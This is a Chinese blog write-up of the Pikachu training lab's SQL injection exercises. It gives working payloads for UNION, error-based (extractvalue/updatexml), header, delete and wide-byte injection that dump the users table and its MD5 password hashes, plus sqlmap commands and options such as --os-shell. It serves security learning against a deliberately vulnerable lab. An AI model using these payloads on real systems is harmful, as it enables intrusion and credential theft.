首页 > 数据库 >SQL注入-基于Pikachu的学习

SQL注入-基于Pikachu的学习

时间:2024-05-04 09:00:12浏览次数:25  
标签:基于 name Pikachu 0x7e select SQL table concat schema

zhSQL注入

SQL数据库的基本语句

SQL 教程 | 菜鸟教程 (runoob.com)

史上最全SQL基础知识总结(理论+举例)-CSDN博客

SQL注入原理

SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。

SQL注入的分类

按注入点分类

  1. 数字型注入
  2. 字符型注入
  3. 搜索型注入

按照执行效果来分类

1.基于布尔的盲注:根据页面返回判断条件真假注入

2.基于时间的盲注:即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。

3.基于报错的注入:即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。

Pikachu靶场

sql 数字型注入(POST)

输入一个 1,页面没有回显,所以直接就burp抓包了

image-20240502211534847

输入以下几个payload:

id=1 and 1=1
id=1 and 1=2
id=1’ and ‘1’=’1
id=1‘ and ’1‘=’2

判断是数字型的注入

输入以下的payload,开始爆字段数:

id=1 order by n //n从1到n,逐渐递增,直到出现错误

image-20240502212324773

这里是到3就出错了,说明字段数为2

接下来id得设置为负数,让第一句话出错,因为我们的payload是插入到原来的语句当中,构成了两个sql的语句,当第一个sql语句正确返回时,便不会显示第二个sql语句的结果。

爆回显的位置:

id=-1 union select 1,2

image-20240502212748035

可以发现1 和 2,都可以回显,我此处选择了2作为回显处

爆数据库名字:

id=-1 union select 1,database()

image-20240502212920792

爆表的名字:

id=-1 union select 1,group_concat(table_name)from information_schema.tables where table_schema='pikachu'

image-20240502213207148

爆列的名字:

id=-1 union select 1,group_concat(column_name)from information_schema.columns where table_schema='pikachu' and table_name='users'

image-20240502213438618

爆数据:

id=-1 union select username,password from users

image-20240502214149259

得到所有人的账号密码,但是这个密码是md5加密过的,md5解密一下就好了

(md5在线解密破解,md5解密加密 (cmd5.com))

image-20240502214316699

sql 字符型注入(GET)

SQL的注释

MySQL中有3种注释:

① #,如果在url框中输入,需要直接url转码成 %23

② -- (最后面有个空格)

③ /**/,内联注释,这个可以在SQL语句中间使用。select * from /*sqli*/ users; //此后可以当作空格用,如果空格被过滤了

我输入了payload后。

1'

image-20240502221520487

发生了报错,然后就在我在分析闭合的时候也终于醒悟到一个东西。(猜测,具体我也不太清楚哈


就是网站通常会把sql语句赋值给一个变量

$query='select * from where id = '$name''

当我们输入1‘的时候,就会发生

$query='select * from where id = '1'''

也就是报错显示为什么会是''1''',这时我们在输入

1' order by 3#

他就会变成

$query='select * from where id = '1'order by 3#'' //只会注释掉#后面的哪一个’,这样就形成了正确的闭合,所以意思就是自己再看报错的时候,直接去掉一对引号,就会舒服不少。

然后言归正传,确定了为字符型,就开始爆字段,#应该直接编码,我们直接用%23(#号的url编码)

1'order by n%23  //从1逐渐递增

image-20240502222940157

此后步骤同第一步基本一致,所以我也不再赘述。

payload如下:

1' union select 1,2%23	//爆回显位置
1' union select 1,database()%23	//爆库名
1' union select 1,group_concat(table_name)from information_schema.tables where table_schema='pikachu'%23	//爆表名
1' union select 1,group_concat(column_name)from information_schema.columns where table_schema='pikachu' and table_name='users'%23	//爆列名
1' union select username,password from users %23 //爆数据

image-20240502224452735

成功了

sql 搜索型注入

网上了解到,搜索型注入一般如下所示:

$sql = "select * from user where password like '%$pwd%' order by password";

闭合一般就是 %'

我们输入一个 1'进行尝试一下

image-20240503102231589

报错信息的确存在一个 %',那我们不妨就尝试一下%‘去进行闭合

1%'#

页面正常回显,那我们就如之前一样开始进行sql注入,先爆字段数

1%' order by n %23//n从1递增

image-20240503102742974

说明字段数有3个,接下来就开始正常的操作

1%' union select 1,2,3 %23 // 爆回显位置,3处都回显
1%' union select 1,2,database() %23 // 爆库名
1%' union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='pikachu' %23//爆表名
1%' union select 1,2,group_concat(column_name)from information_schema.columns where table_schema='pikachu' and table_name='users'%23 //爆列名
1%' union select 1,username,password from users %23//爆数据

image-20240503103312196

sql xx型注入

我们输入

1'

产生报错,容易知道闭合条件就是

)'

image-20240503103653436

所以还是老规矩爆字段数:

1') order by 3%23

image-20240503104211010

字段数为2,所以开始判断回显,都能回显,直接老规矩sql一套流程下来

1') union select 1,2 %23 // 爆回显位置,3处都回显
1') union select 1,database() %23 // 爆库名
1') union select 1,group_concat(table_name)from information_schema.tables where table_schema='pikachu' %23//爆表名
1') union select 1,group_concat(column_name)from information_schema.columns where table_schema='pikachu' and table_name='users'%23 //爆列名
1') union select username,password from users %23//爆数据

sql insert/update注入

这题和之前是不太一样的,打开题目就是一个登录框,让我们注册一下

image-20240503104850943

注册就是给我们的数据插入到数据库当中,也就是insert,之后我们登录就可以从数据库判断,所以我们就去在注册里找找注入点,这里我尝试了一下因为页面url无变化,应该是post请求,我们就直接burp抓包了,发送到重发器

image-20240503105438799

我们接下来需要开始寻找注入点

username=admin'&password=123456'&sex=nan&phonenum=1111&email=2222&add=3333&submit=submit

加了一个单引号,页面开始报错

image-20240503120854205

呃呃呃,这个我也不知道怎么闭合,没看懂,我网上搜了搜,说是去进行报错注入,接下来我们补充一点报错注入吧。

SQL 报错注入

  • 在mysql高版本(大于5.1版本)中添加了对XML文档进行查询和修改的函数:

    updatexml()

    extractvalue()

    当这两个函数在执行时,如果出现xml文档路径错误就会产生报错、

  • updatexml()函数

    • updatexml()是一个使用不同的xml标记匹配和替换xml块的函数。
    • 作用:改变文档中符合条件的节点的值
    • 语法: updatexml(XML_document,XPath_string,new_value) 第一个参数:是string格式,为XML文档对象的名称,文中为Doc 第二个参数:代表路径,Xpath格式的字符串例如//title【@lang】 第三个参数:string格式,替换查找到的符合条件的数据
    • updatexml使用时,当xpath_string格式出现错误,mysql则会爆出xpath语法错误(xpath syntax)
    • 例如: select * from test where ide = 1 and (updatexml(1,0x7e,3)); 由于0x7e是~,不属于xpath语法格式,因此报出xpath语法错误。
  • extractvalue()函数

    • 此函数从目标XML中返回包含所查询值的字符串 语法:extractvalue(XML_document,xpath_string) 第一个参数:string格式,为XML文档对象的名称 第二个参数:xpath_string(xpath格式的字符串) select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
    • extractvalue使用时当xpath_string格式出现错误,mysql则会爆出xpath语法错误(xpath syntax)
    • select user,password from users where user_id=1 and (extractvalue(1,0x7e));
    • 由于0x7e就是~不属于xpath语法格式,因此报出xpath语法错误。

这两个函数都是只能显示32位

回到题目,这里我们使用extractvalue函数去进行报错注入,都在用户那个输入框中爆破的

爆库名的payload如下

1' and extractvalue(1,concat(0x7e,(select database()),0x7e))or '

分析:1后面的单引号是为了闭合1前面的单引号,后面需要爆表、列等只需要替换select里面的语句,后面的单引号是为了闭合1原本存在的后面的一个单引号。如果你后面不想用单引号,想用注释,你需要整个闭合语句,我们的这个payload其实就只闭合了第一个参数,去进行报错注入的。

image-20240503123024713

爆表名:

1' and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='pikachu'),0x7e))or '

image-20240503125439941

爆列名:

1' and extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='pikachu' and table_name='users'),0x7e))or '

image-20240503125547908

爆数据:

1' and extractvalue(1,concat(0x7e,(select group_concat(username,'-',password)from pikachu.users),0x7e))or '

image-20240503131641291由于md5加密是32位,而这个函数只能显示32位,所以明显不够,所以这里需要我们使用substr函数

payload:

1' and extractvalue(1,concat(0x7e,substr((select group_concat(username,'-',password)from pikachu.users),1,32),0x7e))or '//前32位

image-20240503131734363

1' and extractvalue(1,concat(0x7e,substr((select group_concat(username,'-',password)from pikachu.users),32,64),0x7e))or '//后32位

image-20240503131824302

所以完整的admin的密码为:

e10adc3949ba59abbe56e057f20f883e //md5解密为123456

总的来说报错注入挺难的,一不小心就是括号有问题,搞了好长时间,害

sql delete注入

打开题是个留言板,根据提示是删除的时候有些东西,我们抓包看一下

image-20240503154321472

发现在进行删image-20240503154340023除的时候,传了一个参数id=61,我们试试能不能注入

id=61 order by 1

页面回显如下,因为这个东西被我们删掉了,所以没办法回显,那我们就尝试一下报错注入,这次用updatexml

image-20240503154751890

爆库名

id=61 and updatexml(1,concat(0x7e,(select database()),0x7e),1)

image-20240503155945762

爆表名

id=61 and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='pikachu'),0x7e),1)

爆列名

id=61 and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='pikachu'and table_name='users'),0x7e),1)

爆数据(注意还是最多回显32位,所以我们需要取出来,这次用limit

id=61 and updatexml(1,concat(0x7e,(select group_concat(username,password)from users limit 0,1),0x7e),1)

image-20240503160628759

成功得到账号密码。

sql http头注入

打开题目是登录,登录进来就是这,吓我一跳,直接被记录了,那我们抓包看看

image-20240503161131775image-20240503161230571

那我们就在User-Agent处找找有没有注入点,后面加一个单引号试试

image-20240503161505411

果然页面报错了,那我们继续报错注入,payload都在User-Agent全删了,改成payload就行,有一说一报错注入,真好用,香的一批

1' and extractvalue(1,concat(0x7e,(select database()),0x7e))or ' //爆数据库
1' and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='pikachu'),0x7e))or ' //爆表
1' and extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='pikachu' and table_name='users'),0x7e))or ' //爆列
1' and extractvalue(1,concat(0x7e,(select group_concat(username,'-',password)from pikachu.users),0x7e))or '//爆数据

image-20240503162745270

其实到这里我发现这数据显示完整了,我也不懂,为啥不用substr,或者别的

基于boolian的盲注

布尔盲注,与普通注入的区别在于“盲注”。在注入语句后,盲注不是返回查询到的结果,而只是返回查询是否成功,即:返回查询语句的布尔值。因此,盲注要盲猜试错。由于只有返回的布尔值,往往查询非常复杂,一般使用脚本来穷举试错。

这里我都采用sqlmap去注入

sqlmap常用的指令:

 基本用法:
        -u:指定目标URL。
        --threads=<num>:指定并发线程数。
        --level=<level>:设置测试等级,范围从1到5,默认为1。
        --risk=<risk>:设置测试风险级别,范围从1到3,默认为1。

    注入检测:
        --dbs:获取数据库名称。
        --tables:获取当前数据库中的表。
        --columns -T <table>:获取指定表的列。
        --dump -T <table> -C <column1,column2,...>:获取指定表中指定列的数据。

    注入攻击:
        --os-shell:获取操作系统的命令执行权限。
        --sql-shell:获取数据库的命令执行权限。
        --os-cmd=<command>:执行操作系统命令。
        --sql-query=<query>:执行自定义的SQL查询语句。

    其他选项:
        --batch:以非交互模式运行,忽略所有交互请求。
        --flush-session:在每个HTTP请求之前刷新会话。
        --tamper=<tamper_script>:指定自定义的tamper脚本,用于修改请求数据。

搜索一个1,发现url改变,这里很可能就是注入点,我们复制url,去sqlmap跑(我这里是使用了kali里面的)

image-20240503173640341

sqlmap -u "http://192.168.134.67/pikachu-master/vul/sqli/sqli_blind_b.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --batch

这里挺奇怪,竟然没有显示bool注入

image-20240503181222039

爆库:

sqlmap -u "http://192.168.134.67/pikachu-master/vul/sqli/sqli_blind_b.php?name=1*&submit=%E6%9F%A5%E8%AF%A2" --current-db --batch

image-20240503181525788

爆表:

sqlmap -u "http://192.168.134.67/pikachu-master/vul/sqli/sqli_blind_b.php?name=1*&submit=%E6%9F%A5%E8%AF%A2" -D pikachu --tables --level 5  --batch

image-20240503182246296

爆列:

sqlmap -u "http://192.168.134.67/pikachu-master/vul/sqli/sqli_blind_b.php?name=1*&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -T users --columns --level 5  --batch

image-20240503183652113

爆数据:

sqlmap -u "http://192.168.134.67/pikachu-master/vul/sqli/sqli_blind_b.php?name=1*&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -T users -C username,password --dump  --level 5  --batch

结果实在太慢了就不截图了

基于时间的盲注

这题同上sqlmap慢慢跑吧

宽字节注入:

原理:

打开题目输入了一下,1’ 1什么的都没报错,我们抓包,直接开始宽字符注入

1%df'

image-20240503185058274

页面既然发生报错,那我们就把后面注释了,毕竟我们闭合了一个单引号

1%df' #

开始判断字段数:

1%df' order by n#(n从1递增)

n到3报错,所以字段数是2,开始判断回显,1 2 均回显。

1%df' union select 1,2 #

开始老套路:

爆库:

1%df' union select 1,database() # //爆库名

爆表名:(这里爆表名不能再像之前那样了,因为单引号被转义了,那我们就嵌套

1%df' union select 1,group_concat(table_name)from information_schema.tables where table_schema=database() # 

爆列名:

1%df'union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=(select database()) and table_name=(select table_name from information_schema.tables where table_schema=(select database())limit 3,1))#

爆数据:

1%df'union select 1,(select group_concat(username,0x3b,password) from users)#

image-20240503190802178

成功了,拿到账号密码!

标签:基于,name,Pikachu,0x7e,select,SQL,table,concat,schema
From: https://www.cnblogs.com/Muneyoshi/p/18171976

相关文章

  • 基于深度学习网络的十二生肖图像分类matlab仿真
    1.算法运行效果图预览  2.算法运行软件版本matlab2022a 3.算法理论概述      GoogLeNet主要由一系列的Inception模块堆叠而成,每个Inception模块包含多个并行的卷积层,以不同的窗口大小处理输入数据,然后将结果整合在一起。假设某一层的输入特征图表示为X∈ℝ^......
  • MySQL 8.4 初探
    MySQL8.4现已正式发布,这是一个具有重大意义的版本,因为它被指定为长期支持(LTS)版本。LTS软件的引入意味着MySQL8.0.34+将成为一个仅修复错误的版本。创新版本可能每季度发布一次,新的长期支持版本大约每两年发布一次。8.4版本将持续到2026年初。但请记住,将它们纳入主流长期......
  • 浅谈基于uinapp制作一个搞笑图片生成器
    制作一个搞笑图片生成器可以使用多种技术,其中UniApp是一个不错的选择,因为它允许开发者使用一套代码开发多平台应用。以下是使用UniApp制作搞笑图片生成器的基本步骤:1.项目规划在开始编码之前,你需要规划你的应用。确定你的搞笑图片生成器将包含哪些功能,例如:图片选择:允许用户从......
  • m基于LDPC编译码的matlab误码率仿真,对比SP,MS,NMS以及OMS四种译码算法
    1.算法仿真效果matlab2022a仿真结果如下:    2.算法涉及理论知识概要       低密度奇偶校验码(LDPC)译码是现代通信系统中一种高效的错误校正技术,广泛应用于无线通信、卫星通信和数据存储等领域。LDPC码因其良好的纠错性能和接近香农极限的潜力而受到重视。本文......
  • MySQL-08.索引的创建和设计原则
    C-08.索引的创建和设计原则1.索引的声明和使用1.1索引的分类MySQL的索引包括普通索引、唯一性索引、全文索引、单列索引、多列索引和空间索引等。从功能逻辑上分类,索引主要有4种,分别是普通索引,唯一索引,主键索引,全文索引。按照物理实现方式,索引可以分为2种,聚簇索引和非聚簇......
  • MySQL分页查询优化
    CREATETABLEteacher( `id`BIGINT(20)NOTNULLAUTO_INCREMENTPRIMARYKEY,`teacher_id`CHAR(30)NOTNULLUNIQUEKEY, `name`VARCHAR(30)NOTNULL)ENGINE=INNODB;insertintoteacher(teacher_id,name)values('aaa','aaa');inserti......
  • 基于SSM的仓库进销存系统毕业设计论文【范文】
    摘要随着信息技术的不断发展,企业对于仓储管理的要求日益提高。为了提升仓库管理的自动化和智能化水平,本研究设计并实现了一个基于Spring、SpringMVC和MyBatis(SSM)框架的在仓库进销存系统。该系统旨在为企业提供一个高效、准确、实时的库存管理解决方案,以优化库存控制,降低成本......
  • SQL注入-基于Pikachu的学习
    SQL注入SQL数据库的基本语句SQL教程|菜鸟教程(runoob.com)史上最全SQL基础知识总结(理论+举例)-CSDN博客SQL注入原理SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执......
  • mORMot 1.18 第23章 使用纯SQL
    mORMot1.18第23章使用纯SQL有时你可能不想使用ORM,或者由于现有且不可更改的数据库与ORM不兼容而无法使用它。在这些情况下,你仍然可以依靠mORMot的其他功能,同时使用纯SQL。你可以发出纯SQL命令并以JSON格式获取数据。下面的示例展示了如何使用快速且开源的Zeos数据库库与Maria......
  • python批量get pikachu的shell脚本模板
    声明:工具仅用于技术交流,请勿运行该脚本!!若造成损失,一切后果由使用者承担'''EXP:getshellusepikachu'''importrequests###############......